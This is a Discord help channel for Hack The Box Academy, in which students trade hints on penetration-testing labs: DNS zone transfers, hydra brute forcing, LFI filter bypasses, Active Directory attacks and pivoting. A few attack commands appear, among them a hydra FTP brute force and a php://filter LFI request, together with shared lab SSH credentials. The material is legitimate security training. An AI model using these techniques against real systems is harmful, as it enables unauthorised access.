Since this contains a flag please remove it

midnight prawn
#

Hello there! I am working on the final section of the Login Brute Forcing model. The question implies I should have information about the target company, specifically the name of an employee, but I do not see such information in the section. Am I missing something?

midnight prawn
thorn urchin
#

its really dumb

midnight prawn
#

Ah! Thank you @thorn urchin

#

Maybe they should add a note to reference the previous section

red current
#

I'm in the Information Gathering - Web Edition and having issues with Virtual Hosts section. I can only get the first question answered. I found some hints in the forum, but so far nothing has worked. Any ideas why Fuff is only giving errors?

fickle vessel
#

Hi guys, did anyone get stuck with File Transfer linux side?

#

I'm supposed to hash this text "048090bc7ed04f758658975df8f862c8" through "hasher" and it gives me 1219923e466ff7d194dc99a99da5b791 but the module does not accept it...

#

Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, extract the file, and run "hasher <extracted file>" from the command line. Submit the generated hash as your answer.

#

Also... one question, if I spawn a VM on HTB, I can't download the VPN and connect via my Kali VM? I tried to "switch" but it didn't regenerate a new VPN and remove the previous hosts

#

Warning: Each time you "Switch", your connection keys are regenerated and you must re-download your VPN connection file.

All VM instances associated with the old VPN Server will be terminated when switching to a new VPN server.
Existing PwnBox instances will automatically switch to the new VPN server.``` 😦
simple zephyr
#

Who has completed the AD Skill Assessment Part 1?

I don't need a nudge but would like to see if you did a certain area differently then I did, so I can add more stuff to my notes.

rugged veldt
#

hey there, i need a nudge or hint towards 'What is the FQDN of the host where the last octet ends with "x.x.x.203"?' in the DNS section of footprinting

#

ive used an AXFR zone transger to identify hosts, but unsure where to go from here

rugged veldt
dim wolf
#

i have to do it all over again

rugged veldt
#

ive found dc1, dc2, mail1 etc. so do i do a bruteforce on these?

dim wolf
rugged veldt
#

yup i did that

#

so i did axfr on the internal

knotty quest
rugged veldt
#

and i get a bunch of hosts back

simple zephyr
#

hahaha i completely did the AD Assessment Part 1 the HARD way

rugged veldt
austere zenith
#

Hi, im stuck in the Hard Lab from Footprinting. I need a hint. I founded a user and passwd, but i cant connect with ssh

knotty quest
rugged veldt
#

im just seeing if i was on the right track

knotty quest
rugged veldt
#

for the dnsserver parameter in the dnsenum command, i keep the IP address of inlanefreight.htb right?

#

or do i change it to the internal DNS

knotty quest
knotty quest
green trellis
#

So it looks like the boxes in the "service scanning" module just went down? Looks like they vanished in the middle of a module I was working on.

rugged veldt
dim wolf
#

someone to help with AD Enumeration and Attacks Skills Assessment II? ||lazagne isn't dumping the cleartext creds on SQL01||

knotty quest
rugged veldt
#

fierce-hostlist on the internal subdomain

#

dnsenum comes back with no results

knotty quest
rugged veldt
#

dc1, dc2, mail1, ns, vpn, ws1, ws2 and wsus @knotty quest

knotty quest
knotty quest
rugged veldt
scenic walrus
#

hey, I have a meterpreter shell open on my target machine, but it does not do many linux commands like "sudo" "curl" "wget" am i missing something?

scenic walrus
#

a doh. Thanks.

cold nest
#

Hey guys!
Is there a list that shows HTB boxes that are related to the modules?

cold nest
#

thank you!

regal barn
#

Hi. I hope you don't mind answering a question about the module: Attacking Common Services Easy

I was able to upload a web shell but can't get a reverse shell. I can only execute whoami and dir commands

I also uploaded a base64 encoded powershell reverse shell but when I go to the file location in the browser, it just displayed the base64 encoded string. No reverse shell

wheat garden
#

anyone on that can give me nudge on the AD enumeration and attacks skill assessment 1? Im one the 4th question

Submit the contents of the flag.txt file on the Administrator desktop on MS01

found the svc_*** credentials. Tried a few pivot techniques using like using netsh , unsuccesfully trying to set up a winrm session in the powershell webshell,

regal barn
wheat garden
regal barn
wheat garden
#

you can kind of navigate using just the dir command + absolute paths once you find the flag use the command <type> + absolute path to read the flag

regal barn
wheat garden
#

similar method to the "curling" box in hack the box

regal barn
regal barn
wheat garden
main ridge
#

Hi, I'm doing the Footprinting module, and I have to do the following:
Identify if its possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...))
The thing is when I execute
dig axfr inlanefreight.htb @<target-ip>
I found these three TXT records

;; global options: +cmd
inlanefreight.htb.    604800    IN    SOA    inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
inlanefreight.htb.    604800    IN    TXT    "MS=ms97310371"
inlanefreight.htb.    604800    IN    TXT    "atlassian-domain-verification=t1rKCy68JFszSdCKVpw64A1QksWdXuYFUeSXKU"
inlanefreight.htb.    604800    IN    TXT    "v=spf1 include:mailgun.org include:_spf.google.com include:spf.protection.outlook.com include:_sp```
But tried all of them as the answer, and with the format it specifies, but it doesn't work. Any ideas?
#

What I find strange is that the task is submitting "the" TXT record, so maybe I'm doing something wrong in finding three of them

austere zenith
austere zenith
main ridge
main ridge
fathom pendant
#

Check what zones are available

dim wolf
#

favorite module so far

fathom pendant
#

Cg

dim wolf
#

tx

umbral ivy
#

The intranet chapter is really expensive, requiring 2500 modules

carmine hill
#

Can someone spot the mistake here? I’ve made many modifications to the payload trying to make it works, even I tried just copying and paste it and still got nothing. I’m just reviewing this module, I already completed this practice in the past and I don’t remember having any issue with it

#

It’s supposed to be like this

rustic sage
knotty quest
calm abyss
#

hello guys i have a problem with The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt

I cant get the flag, can somebody help ?

sand hearth
#

Modul: LOGIN BRUTE FORCING
Page: 11
Problem: unable to crack FTP (task 2)

  • Once you are in, you should find that another user exists in server. Try to brute force their login, and get their flag.
    command: ||hydra -l g.potter -P rockyou-30.txt -u -f ftp://127.0.0.1 -t 4||
#

What i read on forum i should i have mistake somewhere in ip adress, but i dont know where

pliant sage
sand hearth
#

no error just i cant crack it

#

i think im targeting wrong ip but i dont know which i should target instead

pliant sage
sand hearth
#

yes, part 2, task 2

frigid vector
#

hey guys

#

need a little hint on FIle upload module (skill assessment)

pliant sage
sand hearth
#

rockyou-30 located and run on the ssh target

pliant sage
sand hearth
pliant sage
#

well I don't see any reason why your command wouldn't work

sand hearth
#

ip is good?

#

does it work for you?

woeful ermine
#

try ncrack

#

sometimes it works better than hydra

pliant sage
#

I'll try and tell you if it works for me

hollow bramble
#

In Attacking Common Services Lab - Hard is it normal that the only service I am able to ||bruteforce is MSSQL||? I'm guessing that's how the lab is designed but I tried the ||password list gathered from the previous lab (since it's the same user),, the mutated password list from the previous module (which worked on a few occasions in this module) and rockyou|| and the ||user with or without @inla...|| and so far not a single result. What I'd like to know is should the other services ||be bruteforce-able as well and should my MSSQL bruteforce ||have given me a result?

drifting vine
#

does anyone know how to hack into others accounts?

#

idk hacking i need help with something

autumn pilot
#

@drifting vine familiarise yourself with the #rules

winged zodiac
#

Hey can somebody help me with IMAP/POP3 section of the footprinting module, I could not find the admin mail address I tried to login as robin via openssl but can't FETCH anything there

green trellis
#

Am I missing something? I am working through the Pentesting Career Path and the IPs have been incorrect in Service Scanning and Web Enumeration. Am I not supposed to be following the text and finding these myself?

storm jackal
green trellis
# storm jackal The IP in the skills assessment isn't working?

Correct. So if I am doing this the host is not there. For the last one it said the IP was 10.129.42.253, yet it was .254. I only found it using an nmap scan of the subnet and guessing. I nmap'd the 10.10.10.0/24 and found nothing that would be close to the screenshot though.

plain coral
green trellis
#

This is the academy

#

I wasn't aware we spawned hosts here

storm jackal
green trellis
#

Okay, thanks.

green trellis
last moss
#

Hi, i cant ssh into parrot linux.
SSH to 10.129.121.238 with user "htb-student" and password "HTB_@cademy_stdnt!"
It dosen't work!
ssh -l htb-student -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" 10.129.121.238
Permission denied, please try again.

#

sure, i can reach the ssh port but i can't authenticate.

#

it worked after i just typed the passwod and not copied it!!

calm abyss
vital adder
vital adder
vital adder
calm abyss
calm abyss
calm abyss
vital adder
winged zodiac
calm abyss
#

can you write the command ?

vital adder
vital adder
#

also you can't use quotes for linux command

vital adder
#

yeah you don't need to send me this also for the love of god pls remove spoiler (the flag name)

calm abyss
vital adder
#

and you will get another one from mods if you don't remove the flag name

#

there is a reason the flag isn't named flag.txt

calm abyss
zealous fiber
#

Hey guys can someone help me or give me a nug for the tls ssl Assessment. I can decrypt the cookie but I am unable to craft the Admin cookie. Tried few things

austere zenith
#

Hi, how i can read email in IMAP? i try but i cant. Im stuck in footprinting hard lab.

kindred prism
brisk geode
#

the windows foothold machine on ad module is laggy asf i cant even open a cmd prompt is there any way to fix that?

hexed inlet
brisk geode
#

Active Directory Enumeration & Attacks

Credentialed Enumeration - from Windows

Qus: What is the password for the database user?

i got a pass from the config file but its not working any hints will be helpful.

zealous fiber
#

Hey guys can someone help me or give me a nug for the tls ssl Assessment. I can decrypt the cookie but I am unable to craft the Admin cookie. Tried few things

autumn pilot
brisk geode
fathom pendant
fathom pendant
mighty trellis
#

So I finished windows fundamentals.

#

I learned somethings here.

#

I had a migraine.

#

Drank 2 cups of coffee.

#

Got frustrated to the point where I wanted to break something.

#

But I got it done.

midnight prawn
#

I'm doing the Skills Assessment for "Attacking Web Applications with Ffuf". The 2nd question asks about file extensions, and I'm confused about the answer it accepts. One of the extensions the question expects for the correct answer only responds with 403s. Why would this be considered an extension accepted by the webserver?

fathom pendant
#

Look into what a 403 status is

midnight prawn
fathom pendant
#

403 means it exists but as an anonymous/not authorized user you can't access it, so that's why it's accepted

#

It accepts your request to view the page but tells you, you aren't allowed to see it

#

I'd be more concerned if it said 404

midnight prawn
#

Ok. That's making more sense

#

Thanks!

fathom pendant
#

/etc/passwd isn't a privilege file, but there are also just command line things you can do

#

whoami /priv

rustic sage
#

Hi, I am stuck on Broken Authentication - Skills Assesment. I have the users with country Extension and their passwords, I decrypted htb-sessid cookie, I have htb_sessid_persistent. But I don´t know how to escalate privileges or discover admin module

fathom pendant
#

What module is this related to?

#

And the module didn't talk about anything you can try?

tidal kelp
#

Hi gang, need some help.
are currently on the footprinting hard

#

Able to Log in as Tom to imap service and select his inbox . When I try the content i run in to a wall. have tried "1 FETCH RFC822" and I get BAD error

#

nvm

#

figured it out

#

used wrong fetch command

mighty trellis
#

Someone once told me, "No matter how good you are with a computer, there's never gonna be a day where you dont want to light your computer on fire and push it off a cliff laughing maniacally.

worthy laurel
#

File upload attacks - skills assessment. Can I get a hint about how to read upload.php?

midnight prawn
#

Hey, I just noticed that the time left counter on my target VM is going down WAY to fast

#

like, I'm losing a minute every 15 seconds or so

fathom pendant
midnight prawn
uncut meadow
#

Hi team, I need help for Pivoting, Tunneling, and Port Forwarding -Skills Assessment, What did you recommand to transfer files from windows machine to my attacker one or vice versa

tight basin
#

Anyone had issues with module PIVOTING, TUNNELING, AND PORT FORWARDING section RDP and SOCKS Tunneling with SocksOverRDP exercise ? The host 172.16.6.155 doesn't seem alive.

deft escarp
#

When a module has a length of 2 days or any number of days, is a day defined as 12 hours or 24 hours?

uncut meadow
tight basin
uncut meadow
#

MP if you want no prob

#

I think I know what's your problem

acoustic owl
uncut meadow
acoustic owl
#

Personally, I find these time indications difficult. It all depends on how much you know about the topic. Depending on that, you need longer or shorter.

deft escarp
deft escarp
#

But it is generally helpful for planning ahead. Overall, in glad they're there

acoustic owl
acoustic owl
fickle surge
#

File transfer modules, when they talk about upload vs download, is that in context of the target machine? Upload files from the target to the attack host and download to the target from the attack host? or upload to the target from the attack host and download from the target to the attack host?

fathom pendant
#

Not entirely

#

You can also upload to the attack host from the target

#

Context is mostly within the question

fickle surge
#

so it can vary from question to question, when looking at LOLBAS it says download and upload, is that generally from the target machine perspective? upload / download, from/to the target?

fathom pendant
#

But for simplicity sake: when referring to download, they are generally meaning move file from attack machine to target. Upload will generally mean from target machine to attack machine

fathom pendant
unborn cave
#

Module: osTicket

Find your way into the osTicket instance and submit the password sent from the Customer Support Agent to the customer Charles Smithson .

I'm stuck here. Anybody help me ?

Found it. Thanks @rustic sage

acoustic owl
drifting vine
#

Can someone dm me i need help with something it's personal

fathom pendant
sand marten
#

Hey all, Just did the easy lab for Attacking Common Services, there a hint after getting the flag that says that there are two ways of solving this. If anyone who did this already is willing to discuss it, please DM me! Thank you

red current
#

Anyone else having issues with the assessment for the information gathering web edition module? I can't get the 3rd question because it appears that the i.imgur site is down.

acoustic owl
red current
#

Never mind. I figured out that I already had the answer for the 3rd question.

radiant marten
#

Can anyone help, I'm attempting to intercept a web request with owasp zap, the port number is correct but I can not access the page with the proxy on and intercept turned on, I can access it without them turned on and when I try to refresh the page after turning them on the page just loads indefinitely, it is the same whether i do this in pwnbox or my own VM, i've seen quite a few people asking the same thing on the web but have not seen it resolved anywhere. This is the Using Web Proxies module Intercepting Web Requests.

fathom pendant
#

That's how the proxies work

#

If you're intercepting a web request it's terribly inconvenient if you have to time it just right

radiant marten
#

@fathom pendant i did that and it unset the break and the website is still trying to load

fathom pendant
#

try continuing to hit forward until it loads/you see what you're trying to see; i'm sure the module tells you what to do ¯_(ツ)_/¯

buoyant escarp
#

i try to list all environmental variables with env or printenv, but it just shows me the binary /usr/bin/env... any idea whats going on?

thorny crow
#

Anyone available for sanity check on why war file is failing on tomcat?

supple jackal
#

is there a test for the linux fundamentals

#

like at the end of the module

#

to say you know it

round dune
#

Hi all, I'm struggling with Host3 for 'The Live Engagement' within Shells & Payloads as it has port 445 closed. [However it is suggested I have to use a specific exploit that would target SMB]. Can anyone help me out please and confirm if this is expected?

fathom pendant
#

Usually most modules will have a skills check

supple jackal
#

yes at the end

#

so is that it

#

those knowledge checks

fathom pendant
#

Yes

supple jackal
#

Yosh

#

thanks

round dune
#

Ref my above post/comment, please let me know if it's the right place to ask that Q

fathom pendant
thorny crow
#

On the shells and payloads module, I’ve tried using both the 172.16.1.x and the 10.129.227.x IP addresses, and I cannot get a shell to catch. I know it’s something stupid simple that I’m overlooking, any help appreciated.

round dune
thorny crow
shadow canopy
#

i'm stuck on (Attacking Common Services - Hard)
got rdp & sql & impersonate & linkserver name
im stuck at enabling commands
"A system administrator can enable the use of
'xp_cmdshell' by using sp_configure."
need some help

solved 💯

fathom pendant
#

gonna rerun that one

fathom pendant
#

not smb

#

but something that may remain eternal

#

but yeah that should get you your answer

fathom pendant
deft escarp
#

How long did it take you guys to finish pentester path?

fathom pendant
vital adder
#

if you are in the Login Brute Forcing module hint check your parameter

vital adder
fathom pendant
#

huh... somehow my resolv.conf file got yeeted

#

lol when i did sudo vim on it... it just had the default

pliant sage
#

lol the server side attacks skill assessment must have been the easiest one of all the modules I've done so far

manic hornet
#

stupid question

#

has anyone done the crackmapexec module

orchid timber
#

im new to discord

#

i found it when i was trying to get free v bux

#

are you there 😦

manic hornet
#

never mind i figured it out

orchid timber
#

hi

#

will you be my friend

#

😦

#

😩

#

hewwo

#

nobody wants to be my friend

#

hewo

fathom pendant
#

yep I am dumb i was doing pth wrong :^)

fathom pendant
#

@graceful rampart once I got the ball rolling i had no problem with Julio in the PtH section WOO; it all comes down to "I did the thing wrong" (also cmd being dumb)

vital adder
#

any recommend on a stable pivot method (also port forwarding) through the old windows 7 ?? not all c2 can do this and the few that can is like super unstable

vital adder
frigid summitBOT
#
fortnite kid#5227 has been warned

Reason: Bad word usage

fathom pendant
#

KEK

#

KEKW that was fast

vital adder
#

yeah not sure why all these kid keep getting on this channel

fathom pendant
#

because it's the only set of channels that's not role locked behind verification

#

because some people are just interested in the academy and not main platform

vital adder
#

oh no i mean the kid and spammer not the people interested in learning

fathom pendant
#

that's the base reason

#

the kids and spammers are an unfortunate side effect of these

vital adder
#

i mean there a couple of channel that you can access without verify no idea why this is the channel they always go on first

fathom pendant
#

because it's the most active

vital adder
#

fair. i didn't even think of that

novel matrix
#

He got the 👢

fathom pendant
#

Ugh I think I'll call it a night and work on PtT tomorrow LOL spent a few hours just troubleshooting why my system decided to say "no thanks" to having a dns

#

so I didn't get as much done today as I wanted

novel matrix
#

Chat cleaned 🙂 ❤️

fathom pendant
#

<3

tame lotus
pliant sage
#

does anyone know how to loop over the content of a .txt file in bash?

#

I've been tryin for w in /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt but that just sets the filepath as w

#

nvm found a way

fathom pendant
#

Where you'd insert $x where appropriate

pliant sage
#

yeah i did for read p.[...];done < file.txt

fathom pendant
#

Though most things that make use of wordlists have an option to just do the wordlist

#

Instead of needing to write a loop

#

Usually indicated by the opposite letter case i.e. -l, -L

winged zodiac
#

@vital adder @fathom pendant Thank you guys. Just completed IMAP/POP3 after the hints you provided

fathom pendant
#

Np the things related to mail server enumeration I'd advise just installing a mail client so you can sign in with creds without having to fight protocols :)

#

But doing it the long way def helps reinforce things

vital adder
pliant sage
#

has anyone done the broken authentication module? I'm hacing a problem with bruteforcing usernames, question 4

fathom pendant
vital adder
#

he just discover the new voice AI thing and hoping someone will pay him 97$ for a (i think) free tool

fathom pendant
#

I think it's free, openAI

calm abyss
#

Hello i am having problems with this section, can somebody help ?

fathom pendant
calm abyss
# fathom pendant Please be more descriptive with the issue you're having

I issue the command

curl "http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"

and this is the output

<b>Warning</b>: include(): Failed opening 'php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini' for inclusion (include_path='.:/usr/share/php') in <b>/var/www/html/index.php</b> on line <b>47</b><br />

I tried to change the path to /usr/share/php but it throws more errors

fathom pendant
#

So you added include_path=

calm abyss
#

no i changed resource to /ser/share/php

#

/usr

fathom pendant
#

Also what's the module name? Don't feel like clicking link;
I'd say first check notes to see if there's something you overlooked

calm abyss
#

i have to verify the RFI

winged zodiac
round dune
#

Anyway it might have been an issue with Host3 yday as today port 445 is open on it! Thanks for helping me though

#

Seems like you had a long night 😄

fathom pendant
#

Yeah I didn't really enum 445 too hard I just kinda went through the stuff gone over in the module

winged zodiac
calm abyss
#

stuck

#

ill take a coffee break and think this over

versed frost
#

hey guys, can some help me with how to save the /etc/passwd after editing it, I am using vim

fathom pendant
#

Why are you editing /etc/passwd?

versed frost
fathom pendant
#

That's... That's not how you do that

versed frost
#

that's what they are showing in Password Attack module -- section Passwd, Shadow & Opasswd

fathom pendant
#

Also to edit /etc/passwd you need to do the edit command with sudo

#

If you're on the actual question: just follow the lead on unshadowing

round dune
fathom pendant
fathom pendant
round dune
golden island
#

Hi, I think I need a little tip for: https://academy.hackthebox.com/module/23/section/1494
I found the ?xxx= parameter to use the LFI.
I can read many files including|| /etc/apache2/apache2.conf|| and ||/etc/apache2/envars||.
But since I don't know Apache, nothing jumps out at me, and I can't find any accessible .log. Can you give me some advice? Am I on the right path?

fathom pendant
#

Google where this log files may be

round dune
fathom pendant
#

;) can't forget that you're remoted in :D

#

I did the same thing

golden island
versed frost
#

did anyone managed to get the password for the user Kira in Password Hunting for Linux section? I am kinda stuck there although I used the hint pass and applied the mutation to that password but never got a hit on the ssh service

fathom pendant
#

hint: enumerate a different service

versed frost
fathom pendant
#

Also enumerate with "kira" not Kira

#

if you mutated your password with the custom.rule then you should be fine

versed frost
#

oh, if that's the case, then I have the answer, I only have the problem with capital K

fathom pendant
#

Yeah ignore the capital, use lowercase

versed frost
sacred ermine
#

I have question regarding password attacks module and the section is Linux creds hunting, my question is how can I find the password for Will? I have brute forced the kira and dont have a clue what can I do next, I am really stuck I have checked config files and so on

calm abyss
calm abyss
sage jungle
#

Hi, can anyone guide me which modules should i complete first to prepare for "attacking enterprise networks"?

acoustic owl
sage jungle
#

cpts path is very pricy !

acoustic owl
shrewd mural
#

Hi, I am stuck at Skills Assessment - File Inclusion, I find admin page and be able to read /etc/passwd, but no idea how to get rce. Can someone give me a hint?

acoustic owl
dusky tapir
#

is anyone able to help me with Responder?

#

im having lots of issues with solving the hash im provided, i know what it is supposed to be when its solved but ive tried using john and hashcat to solve it and neither of them work, even if i spoon feed them the answer in a .txt nothing turns up any results and they both just give up

#

if tried them both with some md5 hash(s) and they worked just fine, im not sure why they will not work to solve the ntmlv2

knotty quest
#

Doesn't sound like a problem with responder. Have you tried just using pwnbox? The machine you ssh in to also has hashcat, just copy the relevant hash in to a new file and follow the course material.

knotty quest
# sage jungle cpts path is very pricy !

You can't take the exam without finishing the entire path anyway, so there isn't really a choice there. If you just want to test your abilities, then you can always just unlock that module and then find where you get stuck and review those sections, that will probably cause you more frustration though 🤷‍♂️ . There are no real shortcuts in cybersecurity.

cinder mortar
#

can i dm anyone for footprinting hard lab?

acoustic owl
unreal granite
#

hi i have a question iam at the moment stuck at a question in the INTRODUCTION TO WINDOWS COMMAND LINE module at the skills assessment on the question with the user7 .For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them. I have been able to succesfylly authenticate to the target host and iam trying to connect truh ssh to the domain controller which i whin is greenhorn.corp but i cant get in with the pw of the flag before plz help.. what am i doing wrong

fathom pendant
#

Do a "whoami" command

unreal granite
#

hmm

unreal granite
unreal granite
fathom pendant
#

Lol you're already on the domain controller

#

Aren't you

unreal granite
fathom pendant
#

:)

cedar whale
#

so ... I need to lookup the ip of paydiant.com for "information gathering - web edition" but the problem is that it appears that there are no longer dns records for that domain ...

fathom pendant
#

What's the section?

#

I had no problem with that module

barren dirge
#

Heya, anyone available for a quick DM for Footprinting Lab Hard? I think I am on the right track, but I can't figure out for the love of it on what am I doing wrong and get no output for my scans.

vale salmon
#

I am struggling pretty hard with the File Inclusion Skills Assessment. I have found the ||admin panel|| and can read ||/etc/passwd|| but I cannot for the life of me figure out how to proceed. I can't seem to execute any commands to find the flag. It's driving me insane. Any help would be appreciated.

acoustic owl
supple jackal
#

hey im tryingto view the python3 server but this keeps happening , i have tried to google it but i am getting no where can anyone help

vale salmon
acoustic owl
autumn pilot
#

404 not found focus on that

cedar whale
#

the first question of this one

supple jackal
devout cliff
#

hey everyone, im having some issues with crackmapexec when trying to use it in the attacking common services smb module - says im missing the aardwolf library for crackmapexec. is this something i can use apt or apt-get for or is there another update method i need to follow? this is on parrot.

autumn pilot
#

I'm pretty sure there isn't such a mode (library) in python with the way you have specified it

devout cliff
#

from the crackmapexec github page

#

its listed

supple jackal
#

so im following the linux fundamentals and it shows me this python3 -m http.server

#

then shows me a pic with a link that has localhost:8000/readme.html

devout cliff
#

i also used pip to check if its missing this dependency, it says its fine

cedar whale
acoustic owl
#

pip install aardwolf

cedar whale
#

So can anyone help me with the ip of paydiant.com? The name seems to be no longer registered 😦

supple jackal
#

sometimes i surprise myself in how dumb i am

devout cliff
#

crackmapexec still not working though

#

ill try updating crackmapexec itself maybe

acoustic owl
devout cliff
#

yeah

#

uh oh

#

i tried pip3 install aardwolf and --upgrade

#

neither worked

#

then tried updating crackmapexec itself

#

i broke it i think

autumn pilot
#

cme?

devout cliff
#

same thing comes up

vital adder
#

the pwnbox have crackmapexec pre-install use sudo cme to run but if you do install some other stuff like you did it could mess with the pre-install cme

devout cliff
#

ok when i run with sudo it does back to saying aardwolf is missing again

#

let me try a couple things

vital adder
#

to try with a new pwnbox instance

devout cliff
#

not in pwnbox

#

its my image

#

ive never used crackmapexec before this

acoustic owl
west canopy
cedar whale
acoustic owl
vital adder
#

yep this answer is for the old question

fathom pendant
peak hamlet
#

hey folks, attacking common services - DNS , is this task bugged or something? subdomain busting is taking ages and not finding anything, tried each possible method out there, any nudge?

fathom pendant
#

Why are you subd busting?

vital adder
peak hamlet
vital adder